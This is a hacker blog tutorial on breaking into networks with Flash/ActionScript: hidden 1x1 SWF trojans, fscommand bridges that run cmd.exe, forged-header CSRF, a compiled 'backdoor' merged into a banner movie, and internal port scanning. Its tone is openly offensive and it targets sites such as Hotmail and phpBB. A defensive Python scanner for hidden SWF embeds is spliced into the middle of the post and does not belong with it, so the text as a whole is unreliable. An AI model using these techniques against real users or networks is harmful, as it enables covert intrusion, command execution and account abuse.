Hackers Dot NL

How To Intrude The Networks

by Alex on 15:51, under Diverse, Security, Tutorials

Hacking your way into a network usually depends on your skills as a social engineer and on your technical ability. One of the most powerful techniques, and one that requires extensive knowledge of both, is one of the oldest known to man: the Trojan Horse. Nearly every virus scanner will flag malicious executables, like screensavers. Plus, it takes quite a stupid person to just click and execute such executables.

The power of the Trojan Horse trick is that the users themselves bring you inside their safe iron city, where you set off the attack while they sleep. Building native applications that execute code is quite a lot of work, rarely offers a stealthy way in and is the worst when it comes to porting. So, we want to gain access to the network without getting detected before we reach our goal, and to as many hosts as we want. Difficult? No, of course not!

Web browsers are not what they used to be. Lynx has been replaced by Firefox and Opera, which can use plugins and fancy speed dials. But the most important point here is that they all come with Adobe Flash enabled… Yes, that’s right. It’s easy, it’s stealthy, it’s portable and it lets you get right in :)

The sexiness of it lies in the fact that Flash, for one, is embeddable: you can put a piece of Flash inside your candy-styled, HTML-compliant page and send the victim your “URL”. There are basically two approaches you can take: either you create a 1 by 1 pixel SWF object which you insert somewhere, or you make a visible object, like for example a movie player or a game (which gets spread by the users themselves if they like it, mwuhahahahaha).

Where is the power? Flash has this nifty internal language called ActionScript. It was not designed for this purpose, which makes it perfect for hacking. Extra sexy is that the hack is completely independent of the browser, as long as it allows Flash movies, which makes it cross-platform.

With the power of ActionScript it is perfectly possible to write data out to your database (or someone else’s), gain access to the router and create a reverse backdoor, discover the internal network topology, and communicate with the web browser, ActiveX controls and other applications.

In ActionScript, fscommand allows us to send a message to a scripting language like JavaScript, but you can do much worse things, like sending VB events with strings that can be handled in the programming language environment (VBA). Using the _DoFSCommand handler allows us to pass strings into JavaScript code in any way you like.

Within the embedding page you could create a JavaScript function like this:

function EvilMovie_DoFSCommand(command, params) {
  if (command == "myInstruction") {
    alert(params);
  }
}

In the ActionScript you could drive this function with: fscommand("myInstruction", "w00t… I am executing JavaScript functions..!")

Did I mention you could do something similar with PHP too? Or something sexy like this on Windows boxen:

fscommand("exec", "cmd.exe\t/C\techo\t" + myInstructions + "\t>>" + fName);

fscommand("exec", "cmd.exe\t/C\tattrib\t" + attributes + "\t" + fName);
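The fscommand bridge and the 1 by 1 pixel embed described above both leave traces in the page source, which is where a reviewer looks for them. The following Python is an added example (not code from the post or from any project it mentions): it walks an HTML document with the standard library html.parser, reports every SWF object/embed, marks those that are 1x1 or hidden by CSS, and lists JavaScript functions named *_DoFSCommand. The sample page, the file names in it and the EvilMovie handler name are constructed for this example.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not from the original post): one hidden 1x1 SWF,
# one ordinary visible SWF, and a JavaScript _DoFSCommand handler.
SAMPLE_HTML = """
<html><body>
<h1>Complaint form</h1>
<object data="banner.swf" type="application/x-shockwave-flash" width="550" height="400"></object>
<embed src="evil.swf" name="EvilMovie" width="1" height="1" type="application/x-shockwave-flash">
<script type="text/javascript">
function EvilMovie_DoFSCommand(command, params) {
  if (command == "myInstruction") { alert(params); }
}
</script>
</body></html>
"""


def _is_hidden(attrs):
    """True if the element is effectively invisible: a 1x1 (or 0x0) box or hidden via CSS."""
    for key in ("width", "height"):
        value = attrs.get(key)
        if value is not None:
            m = re.match(r"\s*(\d+)", value)
            if m and int(m.group(1)) <= 1:
                return True
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


class FlashEmbedScanner(HTMLParser):
    """Collects (kind, detail) findings for SWF embeds and fscommand bridges."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): v for k, v in attrs}
        if tag == "script":
            self._in_script = True
        elif tag in ("object", "embed"):
            src = (a.get("src") or a.get("data") or "").lower()
            mime = (a.get("type") or "").lower()
            if src.endswith(".swf") or "shockwave-flash" in mime:
                kind = "hidden_swf" if _is_hidden(a) else "visible_swf"
                self.findings.append((kind, src or "(no src)"))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as raw text; look for the fscommand callback naming pattern.
        if self._in_script:
            for name in re.findall(r"function\s+(\w+_DoFSCommand)\s*\(", data):
                self.findings.append(("fscommand_handler", name))


def scan_html(html):
    """Return every SWF embed and fscommand handler found in the document, in source order."""
    scanner = FlashEmbedScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def suspicious(html):
    """Only the findings worth a second look: invisible movies and JS bridges."""
    return [f for f in scan_html(html) if f[0] in ("hidden_swf", "fscommand_handler")]


if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

A visible 550x400 banner is reported too, but only the hidden embed and the handler make it into suspicious(); on a real page you would feed the same scanner the response body of a proxy or mail gateway.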

As I mentioned before, the web is the limit, as Flash depends on HTTP when it comes to interacting. Danger, danger! Why? Because exactly this allows Flash to make calls in SOAP (Simple Object Access Protocol), which lets you make Remote Procedure Calls over the HyperText Transfer Protocol (yup, that’s HTTP). This means access to any Windows Server running IIS that supports ADO and ASP. This means access to Web Services that support SOAP. This means access to routers and printers using UPnP, thus fooling the NAT. Sexy, isn’t it? Oh, and while we are at it… the cover of Rogue Edition was done in Flash as well (because I lack Photoshop skills and it doesn’t generate SWFs like Flash does).

Some people write worms; I prefer the Hydra approach though. Flash in particular allows this kind of attack through the simple dynamic loading of other “movies”. The ActionScript method allows us to load the components we need on the fly, which makes the Hydra dynamic and modular. For example, you could do a form of OS detection using JavaScript, like getting the operating system version, browser version and so on, by means of a dirty callback function that does an even dirtier variable override (overwriting a data structure):

function EvilMovie_DoFSCommand(command, params)
{
  if (command == "getvictiminfo")
  {
    // getFlashMovieObject is a page helper that looks up the embedded object/embed element by name
    var EvilMovie = getFlashMovieObject("EvilMovie");
    // Any.JavaScript.CallableObjectData stands for whatever browser data you push into the movie
    EvilMovie.SetVariable("/:VictimData", Any.JavaScript.CallableObjectData);
  }
}

The ActionScript that issued the fscommand can then inspect the VictimData variable and “load” a matching module on the fly using the LoadMovie() method. Pretty powerful, if you ask me.

So, you know some browser information now and wooh00, the operating system, but where is the hacking in that? Well, let’s take on something more ‘leet’ then. How about HTTP header injection used for cross-site request forgery (CSRF)? Using Flash we are able to inject unauthorized code into a website by throwing out HTTP requests while keeping control over the HTTP headers, especially where the victim server uses Keep-Alive connections (the default Apache configuration) and the Flash movie runs from within Firefox 3, where you control every part of the request: METHOD, URI, VERSION, headers and its data. You could alter the crossdomain.xml to ensure the freedom of your Flash movie, so it is able to load data through the XML.load(_root.xmldata) function call. This allows loading resources across domains, thus an excellent way for MITM and phishing attacks.

For you newbies out there, CSRF means that you hack a site by stealing an identity. You exploit sites that rely on that identity’s trust by tricking the user’s browser into sending HTTP requests to a target site. If you are able to beat the race conditions, you could build a dynamic DDoS tool (did I mention Flash is a trusted application?). In other words, this is an excellent way to hack Hotmail and phpBB forums :)

The skeleton for forging those fake headers is quite simple. All you need for this is a decent ActionScript compiler or IDE, like Adobe Flash CS3 for example.

// FakeHeaders.as
class FakeHeaders
{
  function FakeHeaders()
  {
    // constructor
  }

  static function main(mc)
  {
    var req:LoadVars = new LoadVars();
    req.addRequestHeader("Evil", "MoreEvil");
    req.decode("a=b&c=d&e=f");
    req.send("http://127.0.0.1:1337/victim", "", "POST");
  }
}

The stealth of such applications is incredible when it comes to anti-virus, because Flash movies are seen as “trusted” web content. Even better is that the only user interaction you need is for the victim to allow “Flash movies” (which is the default) and to click on your link.

Besides HTTP data, Flash can dynamically load binary data. Using DNS rebinding, you can scan the internal network without having to worry too much about firewalls and intrusion detection systems. The format of a Flash movie is binary (SWF), which is created by the Adobe Flash IDE or… tools like Mtasc! Mtasc is an open source ActionScript compiler which can be used to build quick and cool stuff, like backdoors.

A very simple example that does absolutely nothing other than call alert:

// backdoor.as
class Backdoor
{
  function Backdoor()
  {
    // constructor
  }

  static function main(mc)
  {
    getURL("javascript:alert('I just sneaked in…')");
  }
}

You can compile this code by doing:

thex00@blackpearl:/secret/GordonProject$ mtasc -swf myWorm.swf -main backdoor.as

Then add it to another Flash movie:

thex00@blackpearl:/secret/GordonProject$ swfcombine -o demo.swf -T myWorm.swf myBanner.swf

Now how about some local network scanning to ice the cake? The socket handling in ActionScript 3 allows you to scan TCP ports (Flash is not designed for use with UDP) through the SecurityErrorEvent object.

This special object in Flash is an exception, like you have in Java, that is ‘thrown’. The flaw in this design, however, is that it is thrown immediately when a connection fails (closed port), so if the movie isn’t allowed to connect AND doesn’t get a SecurityErrorEvent within seconds, the port is likely to be open.

Here is an example of what such a scanner would look like:

// ScannerSkeleton.as (ActionScript 3)
package
{
  import flash.display.Sprite;
  import flash.events.SecurityErrorEvent;
  import flash.net.LocalConnection;
  import flash.net.Socket;
  public class Main extends Sprite
  {
    protected var host:String;
    protected var port:Number;
    protected var sock:Socket;
    protected var conn:LocalConnection;
    public function Main()
    {
      conn = new LocalConnection();
      conn.allowDomain('*');
      sock = new Socket();
      sock.addEventListener(SecurityErrorEvent.SECURITY_ERROR, onSecurityError);
      sock.connect(host, port);
    }
    // Fired at once for a refused connection; its absence is what the text above reads as "probably open"
    protected function onSecurityError(e:SecurityErrorEvent):void
    {
      // handle the error here
    }
  }
}

Not so great is the spawning of child processes inside the Flash movie, which can cause the movie to hang the browser or, even worse, the operating system. Because Flash allows you to scan inside the network, you should try to find the router, which by default uses the Telnet protocol but these days comes with a web interface. As I’ve mentioned before, it is perfectly possible to reconfigure the router from within Flash, or even worse… enable UPnP!

Finally, some of the conditions you need to meet when hacking with Flash. The advantage is that Flash data is stored locally; the challenge is that by default you only get 100 KB per host to work with (a lot less than that actually, it’s more like 4-5 KB that you can really use for your abusive motivations)… but it rarely gets deleted and doesn’t have an expiration date, unlike cookies.

Why hack with Flash? Because you can! Hope you enjoyed it.

1 comment for this entry:

1. alex

   Great tutorial